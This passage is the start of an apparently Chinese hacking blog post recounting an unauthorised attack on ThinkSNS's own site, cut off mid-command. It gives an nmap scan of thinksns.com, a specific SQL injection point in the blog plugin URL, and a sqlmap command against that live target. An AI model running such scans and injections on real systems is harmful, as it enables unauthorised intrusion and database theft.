(本文涉及的所有漏洞已经被修复!)
(由于文章是后来补写的,有些图可能无法抓到。sorry)
ThinkSNS(简称TS),开源微博引擎。
一直都在看thinksns的代码,但是由于很彩笔,一直没找到什么实质的漏洞,
某天在90sec上,看到某黑阔发的thinksns注入0day,看了下,是一个插件的注入,注入点:index.php?app=blog& mod=Index&act=show&id=2211,惭愧啊,差距啊,羞愤难平的我心中冒出了邪恶的想法。。。。。
——————–分割线————————
0x01 Nmap照亮前方的路
nmap -sS -sU -T4 -A -v thinksns.com
我最喜欢的一个配置,速度也不错,
linux服务器,apache
哈哈,lamp配置
果断看到一个3306
嘎嘎,本地的mysql
然后,就没收集到什么了。。。。。
0x02 Sqlmap凸显神威
http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211
拿到注入点,为了抓紧时间,和管理员赛跑,直接上sqlmap!
# sqlmap.py -u http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id